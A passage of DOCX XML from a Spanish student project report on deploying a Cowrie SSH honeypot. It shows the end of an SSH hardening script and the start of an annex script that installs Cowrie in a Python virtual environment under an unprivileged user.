        <w:t xml:space="preserve">  die "La configuracion de sshd no es valida; se deshace el cambio."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</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Ubuntu 24.04 arranca SSH por socket: el puerto lo fija ssh.socket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if systemctl is-enabled ssh.socket &amp;&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  systemctl restart ssh.socket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl restart ssh.service</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sleep 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ltn "sport = :$SSH_PORT" | grep -q LISTEN \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  || die "sshd no escucha en $SSH_PORT. NO cierres esta sesion y revisa: journalctl -u ssh"</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info "Hecho. SSH escuchando en el puerto $SSH_PORT."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">cat &lt;&lt;EOF</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SIGUIENTE PASO (sin cerrar esta sesion):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    abre OTRA terminal y conecta con</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      ssh -p $SSH_PORT -i &lt;tu_clave&gt; $ADMIN_USER@&lt;IP_PUBLICA&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    Si entra, continua con:  sudo bash 02_instalar_cowrie.sh</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200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo G. Script de Instalación de Cowrie (02_instalar_cowrie.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="120" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env bash</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02_instalar_cowrie.sh - Instalacion del honeypot (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Proyecto Intermodular ASIR - Diego Perez Fonterosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - Crea el usuario sin privilegios "cowrie"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - Instala Cowrie 3.1.0 en un entorno virtual de Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - Aplica cowrie.cfg y userdb.txt del proyecto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - Lo deja como servicio de systemd escuchando en el puerto 2222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - En instancias A1, activa oci-keepalive (reserva de memoria para que</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#    Oracle no recupere la instancia por considerarla ociosa)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Uso:  sudo bash 02_instalar_cowrie.sh   (despues de 01_hardening.sh)</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set -euo pipefail</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COWRIE_VERSION=3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">HP_DIR=/home/cowrie/honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRIPT_DIR="$(cd "$(dirname "$0")" &amp;&amp; pwd)"</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info() { echo -e "\n\033[1;34m[+]\033[0m $*"; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">die()  { echo -e "\033[1;31m[x]\033[0m $*" &gt;&amp;2; exit 1; }</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$EUID -eq 0 ]] || die "Ejecuta el script con sudo."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">for f in cowrie.cfg userdb.txt cowrie.service; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  [[ -f "$SCRIPT_DIR/$f" ]] || die "Falta $f junto al script."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">done</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userdb.txt con un solo caracter no ASCII hace que Cowrie rechace todos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># los logins sin avisar (comprobado en pruebas): se valida antes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if LC_ALL=C grep -qP '[^\x00-\x7F]' "$SCRIPT_DIR/userdb.txt"; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  die "userdb.txt contiene caracteres no ASCII (tildes, enies...). Quitalos."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</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info "Instalando dependencias..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export DEBIAN_FRONTEND=noninteractive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install -yq python3-venv python3-pip python3-dev libssl-dev libffi-dev build-essential</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info "Creando el usuario cowrie..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">id cowrie &amp;&gt;/dev/null || adduser --disabled-password --gecos "" cowrie</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info "Instalando Cowrie $COWRIE_VERSION..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u cowrie -H bash -s &lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">set -euo pipefail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir -p "$HP_DIR" &amp;&amp; cd "$HP_DIR"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[[ -d cowrie-env ]] || python3 -m venv cowrie-env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">source cowrie-env/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python -m pip install -q --upgrade pip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python -m pip install -q "cowrie==$COWRIE_VERSION"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[[ -f etc/cowrie.cfg ]] || cowrie init</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cache de plugins de Twisted: bajo systemd el venv es de solo lectura y,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># sin generarla aqui, twistd avisaria en cada arranque de que no puede escribirla.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c "from twisted.plugin import IPlugin, getPlugins; list(getPlugins(IPlugin))"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
